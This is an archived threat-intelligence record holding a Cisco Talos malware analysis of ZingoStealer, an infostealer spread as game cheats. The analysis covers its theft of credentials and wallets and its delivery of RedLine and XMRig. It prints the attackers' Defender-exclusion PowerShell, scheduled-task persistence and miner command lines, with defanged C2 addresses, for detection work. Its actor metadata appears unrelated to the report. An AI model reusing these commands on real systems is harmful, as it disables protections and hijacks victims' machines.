{
	"id": "f990ef9f-b148-49f0-b1ef-f2a164f03265",
	"created_at": "2026-04-06T01:28:49.696004Z",
	"updated_at": "2026-04-10T03:37:08.863948Z",
	"deleted_at": null,
	"sha1_hash": "aa221050b61e5da2f7212d834f0dba1725dfd339",
	"title": "Threat Spotlight: \"Haskers Gang\" Introduces New ZingoStealer",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3956133,
	"plain_text": "Threat Spotlight: \"Haskers Gang\" Introduces New ZingoStealer\r\nBy Edmund Brumaghin\r\nPublished: 2022-04-14 · Archived: 2026-04-06 01:23:33 UTC\r\nUpdate (04/14/22): Following the initial publication of this blog, we observed a new post in the Haskers Gang Telegram\r\nchannel announcing that ownership of the ZingoStealer project is being transferred to a new threat actor.\r\nWe also observed the malware author offering to sell the source code for ZingoStealer for $500 (negotiable).\r\nBy Edmund Brumaghin and Vanja Svajcer, with contributions from Michael Chen.\r\nCisco Talos recently observed a new information stealer, called \"ZingoStealer,\" that has been released for free by a\r\nthreat actor known as \"Haskers Gang.\"\r\nThis information stealer, first introduced to the wild in March 2022, is currently undergoing active development, and\r\nmultiple releases of new versions have been observed recently.\r\nThe malware leverages Telegram chat features to facilitate malware executable build delivery and data exfiltration.\r\nThe malware can exfiltrate sensitive information such as credentials, steal cryptocurrency wallet information, and\r\nmine cryptocurrency on victims' systems.\r\nWhile this stealer is freely available and can be used by multiple threat actors, we have observed a focus on infecting\r\nRussian-speaking victims under the guise of game cheats, key generators and pirated software, which likely indicates\r\na current focus on home users.\r\nThe threat actor \"Haskers Gang\" uses collaborative platforms such as Telegram and Discord to distribute updates,\r\nshare tooling and otherwise coordinate activities.\r\nIn many cases, ZingoStealer also delivers additional malware such as RedLine Stealer and the XMRig\r\ncryptocurrency mining malware to victims.\r\nWhat is \"Haskers Gang?\"\r\nHaskers Gang is a crimeware-related threat actor group active since at least January 2020, consisting of a small number of\r\noriginal members. 
Their activity ranges from developing methods for stealing confidential information to cryptocurrency\r\nmining, remote access and development of so-called \"crypters\" to avoid detection of malware by security and antivirus\r\nsoftware.\r\nThe group operates a Telegram channel to collaborate with other members, collect logs from systems infected with\r\nZingoStealer and publish announcements related to ongoing development efforts. The group also operates a similar\r\ncollaborative Discord server where new tooling is often shared to enable members to launch more successful intrusions,\r\nimprove antivirus evasion capabilities and otherwise disseminate tactics, techniques and procedures.\r\nThese communities consist of thousands of members and demonstrate that financially motivated cybercrime is increasingly\r\nattractive to many people around the world. The core members of this crimeware group are likely located in Eastern Europe,\r\nand many of the announcements and other communications are written in Russian.\r\nIntroduction to ZingoStealer\r\nIn early March 2022, while monitoring the communications between members of Haskers Gang, we observed the\r\nannouncement of the availability of a new information stealer called \"ZingoStealer.\" This new malware was advertised as\r\nbeing freely available to members of the Haskers Gang Telegram community.\r\nhttps://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html\r\nPage 1 of 13\n\nZingoStealer release announcement.\r\nSince this announcement, we have observed a steady volume of ZingoStealer samples being uploaded to various malware\r\nrepositories.\r\nThe malware is offered in two \"tiers\" of options, with both versions of the malware precompiled and delivered via a\r\nTelegram channel.\r\nZingoStealer and exoCrypt crypter integration.\r\nFor 300 Rubles (~$3 USD), Haskers Gang also offers a pre-built option that leverages their crypter, which they refer to as\r\n\"ExoCrypt.\" This allows affiliates to 
take advantage of antivirus evasion without requiring them to use a third-party builder\r\nto package the malware prior to distributing it.\r\nDuring our analysis of ZingoStealer, we observed the malware author behind the stealer incorporating the XMRig\r\ncryptocurrency mining software into the stealer to further monetize their efforts by using systems infected by affiliates to\r\ngenerate Monero for the malware author.\r\nMiner release announcement sent to the channel on March 18.\r\nWhile researching ZingoStealer, we observed additional functionality, cryptocurrency theft support, and other features added\r\nfrequently, indicating that this threat will likely continue to evolve and mature over time.\r\nDistribution campaigns\r\nAs this stealer is being made available for free to members of the Haskers Gang community, it is likely being leveraged by a\r\nvariety of otherwise unrelated threat actors using various techniques to infect potential victims. We have observed a steady\r\nvolume of new samples in the wild and expect that this trend will continue. In many cases, ZingoStealer is currently being\r\ndistributed under the guise of game cheats, cracks and code generators.\r\nIn one example, the malware was being distributed under the guise of a game modification utility for \"Counter-Strike:\r\nGlobal Offensive.\" The threat actor posted a YouTube video demonstrating use of a tool purported to mod the popular video\r\ngame. 
The video description contained a link to the tool hosted on Google Drive.\r\nYouTube video description.\r\nThe hyperlink points to a password-protected RAR archive stored in Google Drive that contains an executable called\r\n\"loader.exe.\" This executable is responsible for infecting the system with ZingoStealer.\r\nGoogle Drive content.\r\nThe video itself was posted well before the initial announcement of the availability of ZingoStealer; however, the modified\r\ndate for the content hosted on Google Drive was March 22, 2022. This indicates that the hyperlinks in the video descriptions\r\nmay be updated over time at the attacker's discretion.\r\nIn many cases, the ZingoStealer executable was observed being hosted on the Discord CDN, following naming conventions\r\nsimilar to the following examples:\r\nhxxps://cdn[.]discordapp[.]com/attachments/960542241498210334/960544850158166027/2_5357301132811048430.exe\r\nhxxps://cdn[.]discordapp[.]com/attachments/960542241498210334/960542756156100708/2_5357488762752341390.exe\r\nhxxps://cdn[.]discordapp[.]com/attachments/941227101351215104/960556192931938304/loader_cheat_for_roblox.exe\r\nhxxps://cdn[.]discordapp[.]com/attachments/810482847340429352/960156304029151302/Ginzo.exe\r\nThis may indicate threat actors are also distributing the malware within gaming-related Discord servers under the guise of\r\nvideo game cheats.\r\nOther Haskers Gang campaigns\r\nIn another example, we observed a threat actor posting a YouTube video purporting to be a way to obtain free plugins for\r\nAdobe applications.\r\nHaskers Gang video announcement.\r\nThe video description contained a link to a supposed tool which used the Bitly URL-shortening service. 
When clicked, the\r\nvictim is redirected to a password-protected ZIP archive containing a malicious Windows executable hosted on the\r\nMega[.]nz file-sharing website. The executable is packed and drops the RedLine information stealer on victims' systems.\r\nThe threat actor behind this distribution campaign also invited members of the Haskers Gang Telegram channel to post\r\npositive comments in English to add legitimacy to the video and associated hyperlinks.\r\nThis is a secondary payload we've frequently observed coinciding with ZingoStealer infections. In many cases, ZingoStealer\r\nretrieves a list of URLs hosted on the C2 server as \"ginzolist.txt.\" The malware then attempts to retrieve the payloads hosted\r\nat these URLs, one of the most common being RedLine. We've also frequently observed XMRig being delivered to systems\r\ninfected with ZingoStealer.\r\nZingoStealer execution\r\nThe stealer is an obfuscated .NET executable. When executed on victim systems, it attempts to retrieve various .NET\r\ndependencies that provide core functionality used by the malware from an attacker-controlled server.\r\nThe dependencies retrieved by the malware include:\r\nBouncyCastle.Crypto\r\nDotNetZip\r\nNewtonSoft.Json\r\nSQLite.Interop (For both x86 and x64)\r\nSystem.Data.SQLite\r\n.NET component retrieval.\r\nThe retrieved DLL files are then stored in the directory from which the malware is currently running. In the case of\r\nSQLite.Interop.dll, the malware retrieves the x86 and x64 versions and creates a subdirectory for each architecture before\r\nstoring the retrieved binaries.\r\n.NET component directory.\r\nThe stealer then creates a directory structure which is used to collect and save sensitive information that is later exfiltrated to\r\nthe attacker. 
The location for this directory structure is:\r\nC:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\GinzoFolder\r\nWithin this directory, the malware creates subfolders to store the various types of information collected by the malware.\r\nThese subdirectories include:\r\nBrowsers\r\nWallets\r\nDesktop Files\r\nZingoStealer then begins the system enumeration and data collection process, starting by taking a screenshot of the victim's\r\nsystem and storing it as a PNG called \"Screenshot.PNG\" within the directory that was created earlier.\r\nNext, the malware begins to identify and collect sensitive information stored by web browsers installed on the system. This\r\nincludes saved local data, cookies, login data, etc.\r\nIt supports the major web browsers, including:\r\nGoogle Chrome\r\nMozilla Firefox\r\nOpera\r\nOpera GX\r\nDiscovered information is saved within the directory structure we described previously.\r\nThe malware also attempts to enumerate environmental and system information. This data is saved within a text file called\r\n\"system.txt,\" which is also stored within the data staging directory and includes:\r\nIP address\r\nComputer name\r\nUsername\r\nOS version\r\nLocalization information\r\nProcessor information\r\nSystem memory\r\nScreen resolution\r\nStart time\r\nNext, ZingoStealer attempts to collect sensitive information, including user account tokens for collaboration software that\r\nmay be installed, including Discord and Telegram. As mentioned in our previous research related to abuse of collaboration\r\nplatforms, this information can be used to impersonate users, obtain victim account information, or otherwise abuse these\r\nplatforms and their users.\r\nZingoStealer also attempts to access information related to Chrome extensions that may be present within the victim's web\r\nbrowser. 
This information is gathered from the following location:\r\nC:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\\r\n\u003cCHROME_EXTENSION_ID\u003e\r\nThe malware specifically searches for extension data associated with the following cryptocurrency wallet extensions.\r\nTronLink\r\nNifty Wallet\r\nMetaMask\r\nMathWallet\r\nCoinbase Wallet\r\nBinance Wallet\r\nBrave Wallet\r\nGuarda\r\nEQUAL Wallet\r\nBitApp Wallet\r\niWallet\r\nWombat - Gaming Wallet\r\nZingoStealer then searches %APPDATA%\\Local and %APPDATA%\\Roaming for cryptocurrency wallet data associated\r\nwith the following cryptocurrencies.\r\nZcash\r\nArmory\r\nBytecoin\r\nJaxx Liberty\r\nExodus\r\nEthereum\r\nElectrum\r\nAtomic\r\nGuarda\r\nCoinomi\r\nIt also queries the registry (HKCU\\SOFTWARE\\\u003cVALUE\u003e) to identify settings associated with additional cryptocurrency\r\nwallets, including:\r\nBitcoin\r\nDash\r\nLitecoin\r\nAny files or directories present within the infected user's Desktop folder will also be copied to the staging directory. Any\r\ndata successfully collected throughout this process will be stored in the appropriate subdirectory within the data staging\r\ndirectory. Once the collection process has been completed, DotNetZip creates an archive containing all the information,\r\nwhich is then exfiltrated to an attacker-controlled server.\r\nData exfiltration.\r\nThe logs are then processed and delivered to the Haskers Gang Telegram channel so ZingoStealer users can access them.\r\nLog delivery via Telegram.\r\nThe malware is also used as a loader for other malware payloads.\r\nDuring the execution of the ZingoStealer payload, it retrieves the geolocation of the victim's system using freegeoip[.]app. 
It\r\nthen makes an HTTP GET request to the C2 server for a resource called \"cis.txt.\" An example of this can be seen below.\r\nCIS check.\r\nThis could be a reference to the Commonwealth of Independent States (CIS). Many financially motivated cybercriminals\r\nlocated in CIS countries actively avoid infecting systems in these countries to avoid attracting local law enforcement\r\nattention. Similar behavior is common among ransomware operators, who actively avoid targeting organizations located in\r\nthese countries. In one of the initial announcements related to ZingoStealer, the malware author mentioned that, while CIS\r\nfiltering is available, it is not currently in place, but it may be activated in the future based on local law enforcement\r\nattention.\r\nFollowing the geolocation check, the malware requests a list of URLs that it uses to retrieve and execute additional malware\r\npayloads, at the discretion of the attacker.\r\nSecondary payload list retrieval.\r\nThis list of URLs is written to a text file called \"ginzolist.txt\" within the %APPDATA%\\Local directory on the\r\nvictim system. The malware then retrieves the additional malware payloads hosted at these URLs and saves them within the\r\n%APPDATA%\\Local directory. 
An example of this can be seen below.\r\nSecondary payload binary retrieval.\r\nIn this particular case, the binary \"sweet.exe\" was associated with RedLine Stealer and saved at C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\536075.exe,\r\nwhile \"antiwm.exe\" was associated with an injector for the XMRig cryptocurrency miner and saved at C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\209625.exe.\r\nThe retrieved binary payloads then continue the infection process.\r\nExoCrypt crypter\r\nAs previously mentioned, the malware author responsible for ZingoStealer also offers a crypter service that allows\r\nZingoStealer users to obtain encrypted ZingoStealer builds that assist with evading endpoint detection on systems. We\r\nidentified a binary loader for ZingoStealer that may be related to the use of this crypter.\r\nSample metadata.\r\nThe functionality of the code is straightforward: it waits for a randomized sleep interval before\r\ndecrypting the contents of the ZingoStealer binary and saving the decrypted contents as %TEMP%\\ChromeHandler.exe. It\r\nthen executes the ZingoStealer binary, initiating the normal infection process previously described.\r\nMain() function.\r\nTo decrypt the ZingoStealer binary, it retrieves the data from a resource present within the executable called \"zvezdy\" and\r\nstores it within an array.\r\nZvezdy resource contents.\r\nIt then iterates through the array and performs a modulo operation on each of the values. Based on the results of the\r\noperation, each byte is converted into the appropriate value and stored within a second array. 
An example of the\r\nDecryption() function is shown below.\r\nDecryption() function.\r\nFinally, the second array is passed back to the Main() function, saved to disk as ZingoStealer, and executed to continue the\r\ninfection process.\r\nRedLine Stealer\r\nOne of the secondary payloads delivered and executed by ZingoStealer is RedLine Stealer, a well-known information stealer\r\nthat has been analyzed extensively over the past couple of years. It features significantly more support for retrieving data\r\nfrom various applications, browsers, cryptocurrency wallets and extensions.\r\nBelow is a basic comparison between the two stealers as it relates to supported applications from which the malware can\r\nretrieve sensitive data to be exfiltrated to the attacker.\r\nStealer feature comparison.\r\nGiven that RedLine Stealer seems to provide more capabilities, why would an adversary use ZingoStealer to deliver\r\nRedLine Stealer?\r\nBesides ZingoStealer, the malware author also offers additional services that they advertise within the Haskers Gang\r\ncommunity. One service is a \"log access service\" used to monetize information stealer logs obtained from previously\r\ninfected systems. 
Customers can purchase access to the log data generated from various stealers operated by the attacker,\r\nwhich provides them with sensitive account information that can be further leveraged for a variety of purposes including initial\r\naccess, fraud, etc.\r\nAdvertisement for the logging service.\r\nThe malware author behind ZingoStealer assures ZingoStealer users that they do not access log data generated by\r\nZingoStealer.\r\nActor's assurance they do not take interest in the uploaded stolen logs.\r\nHowever, by effectively backdooring ZingoStealer and using it to deliver RedLine Stealer, they can still take advantage of\r\nthe infections achieved by ZingoStealer users. This allows them to let ZingoStealer users perform the heavy lifting in terms\r\nof malware distribution, antivirus evasion, and achieving successful infections, while they passively collect more\r\ncomprehensive logs from the systems. This also allows them to monetize the infections of all ZingoStealer users\r\nsimultaneously, maximizing profitability.\r\nThe RedLine Stealer configuration extracted from analyzed samples contained the following parameters.\r\n{\"ip\": \"193[.]38[.]235[.]228:45347\", \"xor_key\": \"Zag\", \"id\": \"keepye\"}\r\nThe value \"keepye\" stored within the ID field of the configuration matches the username associated with an individual\r\nsuspected to be behind development of ZingoStealer.\r\nThreat actor social media profile.\r\nZingoMiner (XMRig)\r\nIn addition to RedLine Stealer, ZingoStealer also delivers the XMRig cryptocurrency mining malware to victims. 
This is\r\nanother way the malware author behind ZingoStealer is attempting to monetize the operations of ZingoStealer users.\r\nThis was confirmed when the author of ZingoStealer published an announcement within the Haskers Gang Telegram group\r\ninforming the community that they had added XMRig to a new version of ZingoStealer as previously described.\r\nAs mentioned, the main binary payload associated with the mining malware is retrieved and executed by ZingoStealer\r\nduring the initial infection process. It is then executed using conhost.exe as shown below.\r\n\"C:\\Windows\\System32\\conhost.exe\" \"C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\209625.exe\"\r\nOnce executed, it invokes PowerShell using the EncodedCommand option, specifying Base64-encoded PowerShell\r\ncommands to execute.\r\ncmd /c powershell -EncodedCommand\r\n\"QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAk\r\n\u0026 powershell -EncodedCommand\r\n\"QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBv\r\n\u0026 exit\"\r\nThis PowerShell is responsible for creating two exclusions in the Windows Defender configuration on the system.\r\nAdd-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force\r\nAdd-MpPreference -ExclusionExtension @('exe','dll') -Force\r\nIt also attempts to achieve persistence for the miner, ensuring that it is executed following system reboots. 
This is\r\naccomplished by creating a new scheduled task using the following syntax:\r\nschtasks /create /f /sc onlogon /rl highest /tn \"updater\" /tr \"C:\\Users\\\r\n\u003cUSERNAME\u003e\\AppData\\Roaming\\Chrome\\updater.exe\"\r\nFinally, the malware copies itself from its initial starting location to match the path defined in the scheduled task, and then\r\nexecutes the newly created executable.\r\n\"C:\\Windows\\System32\\conhost.exe\" \"C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Roaming\\Chrome\\updater.exe\"\r\nThis executable is also responsible for creating and executing a binary located at:\r\nC:\\Users\\\u003cUSERNAME\u003e\\AppData\\Roaming\\Windows\\Telemetry\\sihost64.exe\r\nIt also creates a file at the following location:\r\nC:\\Users\\\u003cUSERNAME\u003e\\AppData\\Roaming\\Windows\\Libs\\WR64.sys\r\nFinally, it invokes explorer.exe with the following parameters.\r\nC:\\Windows\\explorer.exe shpiczjxwdufjl0\r\nXji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB7VSAkqxepfHfbYtEaV9ZbG09TvsFZSeW\r\nThis injects XMRig into the explorer.exe process and begins the cryptocurrency mining operations. The XMRig client is\r\nlaunched with the following command line parameters:\r\n\\Windows\\explorer.exe --algo=rx/0 --randomx-no-rdmsr --url=pool[.]hashvault[.]pro:80 --\r\nuser=47tAzTKZcJuCui5Bx2FPVoA7UvWoz1QvRCFF1Bpvej5yGJuPPBgqTC8NG95Q3sMwsYV34eonCD3RVSEpSdhxaPRKSiagNNi\r\n--pass= --cpu-max-threads-hint=30 --cinit-stealth-targets=\"Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe\" --cinit-api=\"hxxps://control[.]nominally[.]ru/api/endpoint.php\" --tls --cinit-idle-wait=5 --cinit-idle-cpu=90\r\nInfected systems periodically send beacon data to the API specified when XMRig was launched. 
These beacons are\r\nconsistent with the following example:\r\n{\"computername\":\"\u003cHOSTNAME\u003e\",\"username\":\"\u003cHOSTNAME\u003e\",\"gpu\":\"\r\n\u003cREDACTED\u003e\",\"remoteconfig\":\"\",\"type\":\"xmrig\",\"status\":4,\"uqhash\":\"\u003cREDACTED\u003e\"}\r\nInvestigating the pool address specified by the malware shows that the hash rate has continued to increase as more systems\r\nare infected with ZingoStealer; however, it has not proven to be very lucrative thus far.\r\nMining Pool Statistics\r\nConclusion\r\nZingoStealer is a relatively new information stealer being offered for free to members of the Haskers Gang Telegram group.\r\nIt features the ability to steal sensitive information from victims and can download additional malware to infected systems.\r\nIn many cases, this includes the RedLine Stealer and an XMRig-based cryptocurrency mining malware that is internally\r\nreferred to as \"ZingoMiner.\" While the malware is new, Cisco Talos has observed that it is undergoing consistent\r\ndevelopment and improvement and that the volume of new samples being observed in the wild continues to increase as more\r\nthreat actors attempt to leverage it for nefarious purposes. In many of the distribution campaigns we have observed\r\nassociated with ZingoStealer, threat actors appear to be targeting home users and distributing their malware under the guise\r\nof video game cracks, cheats, and other similar content. Users should be aware of the threats posed by these types of\r\napplications and should ensure that they are only executing applications distributed via legitimate mechanisms.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in\r\nthis post. 
Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their\r\ncampaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense\r\nVirtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure\r\nproducts.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs,\r\nwhether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests\r\nsuspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for\r\npurchase on Snort.org.\r\nThe following Snort SIDs are applicable to this threat: 59145, 59160, 59500 and 59501.\r\nOrbital Queries\r\nCisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are\r\ninfected with this specific threat. 
For specific OSqueries on this threat, click here and here.\r\nIndicators of Compromise\r\nIndicators of Compromise associated with this threat can be found here.\r\nSource: https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html"
	],
	"report_names": [
		"haskers-gang-zingostealer.html"
	],
	"threat_actors": [
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775438929,
	"ts_updated_at": 1775792228,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/aa221050b61e5da2f7212d834f0dba1725dfd339.pdf",
		"text": "https://archive.orkl.eu/aa221050b61e5da2f7212d834f0dba1725dfd339.txt",
		"img": "https://archive.orkl.eu/aa221050b61e5da2f7212d834f0dba1725dfd339.jpg"
	}
}